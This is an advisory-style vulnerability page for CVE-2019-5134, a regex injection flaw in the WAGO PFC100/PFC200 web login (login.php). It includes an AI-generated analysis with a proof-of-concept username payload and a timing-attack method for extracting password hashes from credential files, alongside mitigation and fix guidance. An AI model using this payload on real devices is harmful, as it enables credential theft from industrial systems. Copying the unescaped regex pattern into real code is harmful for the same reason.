CVE-2019-5134
Description
An exploitable regular expression without anchors vulnerability exists in the Web-Based Management (WBM) authentication functionality of WAGO PFC200 versions 03.00.39(12) and 03.01.07(13), and WAGO PFC100 version 03.00.39(12). A specially crafted authentication request can bypass regular expression filters, resulting in sensitive information disclosure.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A regex injection vulnerability in WAGO PFC100/200 WBM authentication allows an unauthenticated attacker to bypass password validation and disclose sensitive information.
Vulnerability
The Web-Based Management (WBM) authentication functionality in WAGO PFC200 firmware versions 03.00.39(12) and 03.01.07(13), and WAGO PFC100 firmware version 03.00.39(12) contains a regular expression injection vulnerability in the PasswordCorrect() function of login.php. The function constructs a regex pattern by directly concatenating the user-supplied $username into "/^" . $username . ":" without sanitization or escaping. This allows an attacker to inject regex metacharacters, altering the intended matching behavior. The vulnerability is present in all firmware versions from at least version 10 and likely earlier [1].
Exploitation
An unauthenticated attacker can send a specially crafted HTTP request to the WBM login endpoint with a malicious username string containing regex metacharacters (e.g., .* or |). The crafted username is processed by PasswordCorrect(), which uses the unsanitized input in preg_match(). By injecting patterns that match multiple lines or bypass the intended username check, the attacker can cause the function to retrieve password hashes from the /etc/lighttpd/lighttpd-htpasswd.user file (or /etc/shadow if system authentication is configured) for arbitrary users [1].
Impact
Successful exploitation results in disclosure of password hashes for other users, leading to sensitive information disclosure. The attacker gains the ability to extract hashed credentials, which may be cracked offline to obtain plaintext passwords. The CVSSv3 score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N), indicating low confidentiality impact with no impact on integrity or availability [1].
Mitigation
As of the publication date (2020-03-10), no official patch has been released by WAGO. The vulnerability affects all firmware versions from at least version 10 and likely earlier. Users should monitor vendor advisories for updates. Until a fix is available, restrict network access to the WBM interface to trusted networks and consider using VPN or firewall rules to limit exposure [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
4- Wago/WAGO PFC100 Firmwarev5Range: version 03.00.39(12)
- Range: version 03.00.39(12)
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization and regex anchoring in the username parameter allows regex metacharacter injection to bypass line-matching logic."
Attack vector
An unauthenticated attacker sends a specially crafted HTTP request to the Web-Based Management (WBM) login endpoint. The `$username` parameter is injected into a regex pattern (`preg_match("/^".$username.":/", $pwFileLine)`) that lacks proper anchoring and input sanitization [CWE-777]. By supplying a username such as `(?x)admin....`, the attacker can bypass the intended line-matching logic and cause the application to match the `admin` user's password hash line in `/etc/lighttpd/lighttpd-htpasswd.user` (or `/etc/shadow`). The attacker can then brute-force the salt and hash character-by-character using a timing side-channel attack via the `crypt()` function [ref_id=1].
Affected code
The vulnerability resides in the `PasswordCorrect()` function in `login.php`. The function uses `preg_match("/^".$username.":/", $pwFileLine)` to match a username against lines in the password file. Because the `$username` variable is interpolated directly into the regex pattern without escaping or anchoring beyond the leading `^`, an attacker can supply a crafted username that matches unintended lines [ref_id=1].
What the fix does
The advisory does not include a patch diff, but the remediation guidance is implicit: the `$username` input must be sanitized or escaped before being interpolated into the regex pattern, and the regex should be anchored more strictly (e.g., using `preg_quote()` on the username) to prevent regex metacharacter injection. Additionally, the application should avoid revealing whether a username matched a line in the password file, and should use constant-time comparison for password verification to prevent timing side-channel attacks [ref_id=1]. No official patch is published in the provided bundle.
Preconditions
- networkThe WBM login endpoint must be network-accessible
- authNo authentication is required to reach the login page
- inputThe attacker must be able to send arbitrary HTTP POST/GET parameters to the login form
Reproduction
The advisory provides a proof-of-concept string: `(?x)admin....` as a username input will match the `admin` user's line in the password file. The attacker can then test each subsequent character of the salt/hash by appending the tested character followed by `#` and using a timing attack on the `crypt()` function to disclose the full salt and password hash [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- talosintelligence.com/vulnerability_reports/TALOS-2019-0923mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.